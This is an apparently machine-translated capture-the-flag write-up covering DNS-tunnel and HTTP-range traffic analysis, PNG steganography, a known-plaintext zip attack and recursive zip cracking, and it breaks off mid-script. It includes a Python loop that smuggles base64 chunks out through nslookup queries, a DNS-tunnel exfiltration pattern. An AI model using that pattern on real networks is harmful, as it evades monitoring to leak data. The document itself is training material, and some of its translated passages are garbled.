MISC

1 Sign in

Difficulty Sign in

Copy the flag input given

2 range_download

Difficulty Medium

flag{6095B134-5437-4B21-BE52-EDC46A276297}

0x01

Analyzing the dns traffic, it was found that dns tunnel data exists in dns ip.addr=1.1.1.1. After sorting, base64: is obtained

cGFzc3dvcmQ6IG5zc195eWRzIQ==

Solution base64 to get :

password: nss_yyds!

0x02

Analyzing http traffic, it was found that ip.addr==172.21.249.233 has http segmented download data, and only one byte is downloaded according to the request header range requirements each time. Since it is a random download, it needs to be sorted in order. After sorting, you can get an encrypted compressed package.

During the collation process, you will find that 2349 bits of bytes are missing, and you need to try to fix it.

Since we get the zip password in0x01, we can blast the byte, and if the password is correct, the repair will be successful.

0x03

Unzip the compressed package and get the QR code.

After scanning, we get :

5133687161454e534e6b394d4d325a7854475233566e6870626a42554e6a5a4a5645466c4e47786a62324e464d47705557464635546d6c536148565165564659645563774e327073515863324f584655524731455556413455557070634 4686957444d336544684c596c4255556e6333636e687165486c756446413351577470566e4242526b6c4a5457316c515452754d555661636e4a7859556430566c4d3559557844656a4a35626c68334d6d5a4c51513d3dciphey analysis obtained flag:

ciphey '5133687161454e534e6b394d4d325a7854475233566e6870626a42554e6a5a4a5645466c4e47786a62324e464d47705557464635546d6c536148565165564659645563774e327073515863324f584655524731455556413455555555555 70706344686957444d336544684c596c4255556e6333636e687165486c756446413351577470566e4242526b6c4a5457316c515452754d555661636e4a7859556430566c4d3559557844656a4a35626c68334d6d5a4c51513d3d' Possible plaintext: '5133687161454e534e6b394d4d325a7854475233566e6870626a42554e6a5a4a5645466c4e47786 a62324e464d47705557464635546d6c536148565165564659645563774e327073515863324f5846555247314555564134555 570706344686957444d336544684c596c4255556e6333636e687165486c756446413351577470566e4242526b6c4a5457316 c515452754d555661636e4a7859556430566c4d3559557844656a4a35626c68334d6d5a4c51513d3d' (y/N): Possible plaintext: '5133687161454v534v6y394w4w325z7854475233566v6870626z42554v6z5z4z5645466x4v47786 z62324v464w47705557464635546w6x536148565165564659645563774v327073515863324u5846555247314555641345555555 570706344686957444w336544684x596x4255556v6333636v687165486x756446413351577470566v4242526y6x4z5457316 x515452754w555661636v4z7859556430566x4w3559557844656z4z35626x68334w6w5z4x51513w3w' (y/N): Possible plaintext: 'w3w31515x4z5w6w43386x62653z4z6564487559553w4x6650346559587z4v636166555w45725451 5x6137545z4x6y6252424v665074775153314644657x684561786v6363336v6555524x695x486445633w4447596864436070 75554314655554137425556485u423368515370723v477365546956465561565841635x6w64553646475550774w464v4232 6z68774v4x6645465z4z5z6v45524z6260786v6653325744587z523w4w493y6v435v4541617863315' (y/N): Possible plaintext: 'd3d31515c4a5d6d43386c62653a4a6564487559553d4c6650346559587a4e636166555d45725451 5c6137545a4c6b6252424e665074775153314644657c684561786e6363336e6555524c695c486445633d4447596864436070 75554314655554137425556485f423368515370723e477365546956465561565841635c6d64553646475550774d464e4232 6a68774e4c6645465a4a5a6e45524a6260786e6653325744587a523d4d493b6e435e4541617863315' (y/N): Possible plaintext: 'flag{6095B134-5437-4B21-BE52-EDC46A276297}' (y/N): y ╭────────────────────────────────────────────────────────────────╮

│ The plaintext is a Capture The Flag (CTF) Flag │

│ Formats used: │

│ hexadecimal │

│ base64 │

│ utf8 │

│ base62 │

│ base58_bitcoin │

│ base32 │

│ utf8Plaintext: 'flag{6095B134-5437-4B21-BE52-EDC46A276297}' │ ┰────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

import os

import time

import requests

import random

for i in 'cG Fz c3 dv cm Q6 IG 5z c1 95 eW Rz IQ=='.split(' '):

os.system('nslookup ' + i+'.nss.neusoft.edu.cn 1.1.1.1')

time.sleep(5)

l=int(requests.head('http://172.21.249.233/flag.7z', stream=True).headers['Content-Length'])

a=set()

while len(a) !=l:

b=random.randint(0, l)

r=requests.get('http://172.21.249.233/flag.7z', stream=True, headers={'Range': 'bytes=' + str(b) + '-' + str(b)})

if r.status_code==416:

print(b)

a.add(b)

print(len(a))

0x04

Difficulty Sign in

flag: flag{zhe_ti_mu_ye_tai_bt_le_XD}

This question examines the use of PNG structure and common tools.

The question is just to store unnecessary zlib data streams in IDAT data, which can be decompressed directly through binwalk.

binwalk -Me PNG.png

3 is just a PNG, don't think too much.png

Difficulty Difficult

flag:

flag{zheshirenchude}

This question examines the degree of understanding of PNG structure and common questions

Open the title is PNG picture, binwalk has no exception

When 010editor opened, it found a crc exception, and there was no problem with the structure for the time being.

Opening tweakpng found that the CRC values of IHDR, IDAT, and IEND data blocks are not correct.

Then use StegSolve to view it and find that the picture has hidden boxes. The IDAT data is selected in the box, indicating that there should be special features of the IDAT data that need to be viewed.

There is only so much information about the picture itself. From the PNG structure, from the perspective of the PNG structure, first of all, there is a problem with the IHDR block CRC. Generally speaking, the image height is modified. Through the CRC inverse calculation script (or directly modify the height value blindly) it is found that there are hidden images under the picture. Check stegSolve and found a hidden pattern

The three boxes circle some data structures of the png image, and the second box shows that the png image data is compressed using zlib. Select the box here to indicate that you need to pay attention to zlib compressed data.

The third box is the specific compressed block data structure. The content of this picture is a screenshot of the official website of libpng, but when you actually visit the official website, you can find that the compressed block structure labeled does not match.

The numbers have been deliberately modified, so it can be seen that the 2233 series of numbers should be a certain key or hint of the title.

After that, all IDAT data blocks CRC values are incorrect. Copy all CRC values. hex decoding. Found it's hint

hintis[IEND_and_11]_jiayou_XD.

View IEND according to hint, the normal IEND data should be empty and only serve as the end of the file flag. But now there is data.

Extracting the data, it was found that the first four bits were 9C 78, while the zlib data header was 78 9C. Modify the first four digits to decompress. It was found that it was base64 and then decoded. Finally, the first paragraph of flag is obtained

flag{zheshi

After getting the first paragraph, the 11 in the hint has not been resolved yet. By viewing, chunk 11 is discovered, which is the last IDAT data block. According to the previous one, there is a hint 2233, and the full data block search is 2233. It was found that the end of the data block contains 2233, only this one

According to the previous flag, it is guessed that this is also zlib compression, and the 32 HEX values from the beginning of 2233 to the CRC value will be copied, and 2233 will be modified to zlib data header 78 9C

It was found that the decoded data is an encoding. According to the previous flag, this should be the encoding of other base family classes. Through basecrack or online base decoding, you can know that this is base91 and decoded as renchude}

The latter flag is: renchude}

Merge two sections to get the final flag

flag{zheshirenchude}

Difficulty Simple

View PDF

I found many tips for getting lighter and lighter in the text

Thinking that flags may be hidden in the text in white, select all text

I found a blank word at the end of the second to last paragraph

Copy or edit it to other colors

Get flag

flag{hey_there_is_no_thing}

Where is

Difficulty : Difficulty

This question examines the practical application of plain text attacks. In the actual environment, plain text files will not be actively provided for plain text attacks. You need to find plain text files or some plain text to attack by yourself.

The compressed package contains two files LICENSE and README.md

LICENSE is an open source certificate file

Download all the usual open source protocols and compare sizes

It is found that Apache 2.0 is very similar in size

Use the built-in LICENSE file in github to successfully decrypt it

There is also a simple method. Many open source licenses start with spaces. You can directly use multiple duplicate spaces as plain text.

6 eviptedzip

Difficulty Simple

You can see a QR code that lacks locator. After completing it, you will get a prompt: a common implicit writing

Separate the picture and get the compressed package

After decompression, use stegpy to get flag

flag{Do_U_Kn0w_Ste9py?}

7 easysteg

Difficulty Simple

The first layer is 50996.zip

Writing script decryption recursive compression package 300 layers

8 Compression Package Compression Package Compression Package

mkdir zips

mkdir zips/files

mv 50996.zip ./zips

cd zips

While :

do

file=$(ls -t | tail -1)

pass=$(zipinfo $file | grep - | cut -d ' ' -f12 | cut -d . -f1)

unzip -P $pass $file

echo 'unzip -P $pass $file'

mv $file ./files

done

The last layer is 23333.zip 6-digit numeric password is 756698

Open sqlite to find flag in the employees table

flag{Unz1p_i5_So_C00l##}

Problem Solving Script

WEB

Difficulty Medium

9 flag

Human flesh sorting, then mentally calculate base64

Solution 1

and other websites have enough output, copy it, and then use the search/replace function supported by most text editors to replace the message with a format similar to the following.

a=list('a' * 20)

.

a[1]='a'

a[20]='b'

a[3]='c'

.

# at last

import base64

print(base64.b64decode(''.join(a)))

Solution 2

Question SSE pushes messages to the browser in real time, the route is '/flag', you can directly:

import base6